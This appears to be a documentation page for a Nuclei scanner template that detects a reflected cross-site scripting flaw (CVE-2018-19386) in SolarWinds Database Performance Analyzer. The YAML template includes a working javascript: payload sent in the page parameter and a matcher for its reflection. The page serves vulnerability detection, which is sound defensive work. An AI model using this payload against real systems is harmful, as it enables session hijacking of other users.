SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting
ID: CVE-2018-19386
Severity: medium
Author: pikpikcu
Tags: cve,cve2018,solarwinds,xss
Description
Section titled “Description”SolarWinds Database Performance Analyzer 11.1.457 contains a reflected cross-site scripting vulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the ‘Try Again’ Button on the page, aka a /iwc/idcStateError.iwc?page= URI.
YAML Source
Section titled “YAML Source”id: CVE-2018-19386
info: name: SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting author: pikpikcu severity: medium description: SolarWinds Database Performance Analyzer 11.1.457 contains a reflected cross-site scripting vulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or defacement of the affected application. remediation: | Apply the latest patch or upgrade to a non-vulnerable version of SolarWinds Database Performance Analyzer. reference: - https://i.imgur.com/Y7t2AD6.png - https://medium.com/greenwolf-security/reflected-xss-in-solarwinds-database-performance-analyzer-988bd7a5cd5 - https://nvd.nist.gov/vuln/detail/CVE-2018-19386 - https://github.com/Elsfa7-110/kenzer-templates - https://github.com/merlinepedra/nuclei-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-19386 cwe-id: CWE-79 epss-score: 0.00177 epss-percentile: 0.54797 cpe: cpe:2.3:a:solarwinds:database_performance_analyzer:11.1.457:*:*:*:*:*:*:* metadata: max-request: 1 vendor: solarwinds product: database_performance_analyzer tags: cve,cve2018,solarwinds,xss
http: - method: GET path: - "{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f"
matchers-condition: and matchers: - type: word words: - '<a href="javascript:alert(document.domain)//'
- type: status status: - 200# digest: 4b0a00483046022100ad09c8e856cde90faefd1babf99b543392cb694cbbe3dca1057690556e0c29c1022100bc7567e2af084d21be44c60025d515b30767b9bd09fd4f805f719f74b53eae10:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-19386.yaml"